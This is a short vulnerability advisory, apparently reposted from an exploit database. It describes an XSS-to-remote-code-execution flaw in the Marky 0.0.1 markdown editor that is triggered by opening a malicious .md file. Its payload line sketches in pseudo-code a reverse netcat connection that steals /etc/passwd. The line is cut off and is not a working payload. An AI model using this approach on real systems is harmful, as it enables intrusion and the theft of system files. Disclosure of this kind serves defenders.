# Marky 0.0.1 XSS&RCE漏洞
==EXP==
# Exploit Title: Marky 0.0.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/vesparny/marky # Version: 0.0.1 # Tested on: Linux, MacOs, Windows # Software Description: Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof Video https://imgur.com/a/qclfrUx # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容